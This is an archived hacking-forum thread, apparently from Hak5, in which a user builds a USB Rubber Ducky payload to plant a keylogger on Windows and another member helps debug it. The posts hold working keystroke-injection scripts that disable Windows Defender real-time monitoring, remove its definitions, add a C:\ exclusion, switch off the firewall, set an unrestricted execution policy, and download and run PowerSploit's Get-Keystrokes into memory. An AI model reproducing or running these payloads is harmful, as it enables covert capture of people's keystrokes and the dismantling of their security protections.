hbkahuna Posted February 1, 2023 Share Posted February 1, 2023 Hello I recently purchased a rubber ducky and one of the power scripts that I want to add is a keylogger.I believe I tried all of the developed examples on the Hak5 site and I cant get by the Windows defender. I tried adding additional power scripts to shut down the defender prior to the keylogger but it catches the code as dangerous virus and quarantines it. Can someone help me and show me the error of my ways. Regards Link to comment Share on other sites More sharing options...
dark_pyrro Posted February 1, 2023 Share Posted February 1, 2023 4 minutes ago, hbkahuna said: I tried all of the developed examples on the Hak5 site What examples did you try? Link(s)? Link to comment Share on other sites More sharing options...
hbkahuna Posted February 2, 2023 Author Share Posted February 2, 2023 Here is a snippet of code this one I get no error but it doesnt create a logger file and I dont find the ps1 file on the system. There was some other examples that you sent the results via email but they stated you had to configure google a certain way but googkle doesnt allow that anymore. so???? REM STAGE1 REM Title: PowerShell_Administrator REM Target: Windows 10/11 REM Props: Hak5 REM Version: 1.0 REM GUI x brings up menu and the a selects PS admin GUI x DELAY 10 a DELAY 10 TAB DELAY 10 TAB DELAY 10 ENTER REM STAGE2 Windows Defender REM attempts to disable defender STRING Set-MpPreference -DisableRealtimeMonitoring $true; REM STAGE 3 KeyLogger REM What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. REM Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. REM The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command REM is how many minutes you want to command to run. STRING ATTACKMODE HID STORAGE DELAY 100 ENTER STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 1000 ENTER STRING Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10DELAY 100 ENTER Link to comment Share on other sites More sharing options...
dark_pyrro Posted February 2, 2023 Share Posted February 2, 2023 First of all, I would recommend an initial DELAY in the payload, like: DELAY 3000 Using DELAY 10 is pretty useless, better just skip them or create some DELAYs that makes a difference (i.e. with somewhat higher values). The lowest value is actually 20https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delay#delay Are you perhaps using a Windows installation that has another system language other than English? Are you running with a user in the Windows system that can't be elevated to admin permissions? Did you verify that real time monitoring actually is turned off? Create a payload that just contains "STAGE1" and "STAGE2" and check the Defender console if it really is disabled or not. 59 minutes ago, hbkahuna said: I dont find the ps1 file on the system as the comments in the payload says; "it downloads a simple script from github into memory" so it shouldn't touch any storage device, that's perhaps why you can't find it (in case you refer to your local PC when saying "system") The log path is local, so any "loot" won't be saved to the Ducky storage Are you using a local account for the user on the PC or a online/Microsoft one? Directories (especially Desktop) aren't treated the same for these two kinds of users. Locations are different. Try some other more "generic" location, such as C:\tmp The line STRING Set-MpPreference -DisableRealtimeMonitoring $true; has no ENTER following it which makes a mess it's probably concatenated with the STRING that follows STRING ATTACKMODE HID STORAGE which results in Set-MpPreference -DisableRealtimeMonitoring $true;ATTACKMODE HID STORAGE which I'm certain PowerShell will have issues to interpret Not sure what this line is supposed to do. It just writes out that string STRING ATTACKMODE HID STORAGE If in need of changing the ATTACKMODE it should be only ATTACKMODE HID STORAGE However, I don't really see the need of that since the payload already is in ATTACKMODE HID and it's never using STORAGE so kinda obsolete There's also probably a typo on the second to last line in the payload "STRING Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10DELAY 100" the "DELAY 100" in the end of the line should most likely be a line of itself (not sure why it's there though since it's the last line of the payload) For the payload in general, every STRING line that has a line that follows that says ENTER could be substituted with STRINGLN (and remove the ENTER LINE) Last but not least, I'm not really a fan of payloads that try to disable local AV since it's most often not a valid use case scenario in the real world. Either the computer is running with a user that can't make these kinds of changes (such as turn off AV protection) or those kinds of things gets logged and triggers red alerts for the blue team. I would probably write the payload something like this (haven't tried it though) DELAY 3000 REM STAGE 1 GUI x DELAY 50 a REM The above could be/should be; STRING a DELAY 50 TAB DELAY 50 TAB DELAY 50 ENTER REM STAGE 2 STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; REM STAGE 3 DELAY 100 STRINGLN IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') DELAY 1000 STRINGLN Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10 Link to comment Share on other sites More sharing options...
hbkahuna Posted February 3, 2023 Author Share Posted February 3, 2023 Thankyou for your comments, I found I first had to get past my widow defender and another anti-virus. You got me onthe right solution path, I am surprised that the videos and all of the conversations don't mention that elephant in the room. I did the following and it did the trick. I will just show that snipet . Then back to keylogger which I think will work.. Im going to play with the delays and why a few of the key commands are there but Im just happy I got past the anti-virus. be good to go but thanks again! DELAY 750 GUI r DELAY 1000 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ALT y DELAY 750 ENTER ALT SPACE DELAY 1000 ENTER STRING m ENTER DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING netsh advfirewall set allprofiles state off ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL s ENTER DELAY 1000 STRING C:\Windows\config-59657.ps1 ENTER DELAY 1000 ALT F4 DELAY 750 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 750 ALT y ENTER DELAY 1000 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 750 STRING m ENTER DELAY 750 DOWNARROW REPEAT 100 ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER Link to comment Share on other sites More sharing options...
hbkahuna Posted February 6, 2023 Author Share Posted February 6, 2023 Ive trimmed the code quite a bit. I have a new issue that I have tried a number of things that dont work wondering if anyone else has solved the path is null issue: Here is the updated code: DELAY 3000 REM STAGE 1 Start your engines******************** GUI x DELAY 500 STRINGLN a DELAY 1000 ATTACKMODE HID DELAY 500 REM STAGE 2 Stop Windows Defender Anti Virus******** REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy REM Unrestricted}" DELAY 1000 STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true"; DELAY 1000 STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\"; DELAY 500 STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; DELAY 1000 STRINGLN netsh advfirewall set allprofiles state off DELAY 1000 STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false DELAY 1000 SHIFT y DELAY 500 ENTER; REM Stage 2 KeyLogger*********************************************************** REM DK is the RubberDuckey Label REM Notes at end of script about KeyLogger DELAY 1000 STRINGLN $u=gwmi Win32_Volume|?{$_.Label -eq'DK'}|select name;cd $u.name; GET ERROR here....cd : Cannot process argument because the value of argument "path" is null. Change the value of argument "path" to a non-null value. DELAY 1000 STRINGLN powershell "& 'Rundll33.exe'; 'svchosts.exe'; Keylogger DELAY 1000 Link to comment Share on other sites More sharing options...
dark_pyrro Posted February 6, 2023 Share Posted February 6, 2023 That way of populating $u should work. Is your Ducky really using 'DK' as its label (and not the default 'DUCKY' label)? Alternatives to try (if the Ducky label of 'DK' is correct) might be: $u = Get-WmiObject -Class Win32_Volume | where {$_.Label -eq "DK"} | select -expand name or $u = (gwmi win32_volume -f 'label=''DK''').Name Link to comment Share on other sites More sharing options...
hbkahuna Posted February 6, 2023 Author Share Posted February 6, 2023 Fantastic thankyou! Link to comment Share on other sites More sharing options...
hbkahuna Posted February 8, 2023 Author Share Posted February 8, 2023 ok I have solved all the issues the final part is running the keylogger exe's There is one item busting me and thats the service antimalware. It was giving me an error that the executables had a virus . So I used task manager to see what I may of missed killing and theres a antimalware that is running. I try killing it and I get the same error not allowed. The line of code is Stop-Service -Force -Name "WinDefend" Im wondering if I need to somehow add the two executables as expectable files ?? Would appreciated some help Im on the 5 yard line so to speak Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.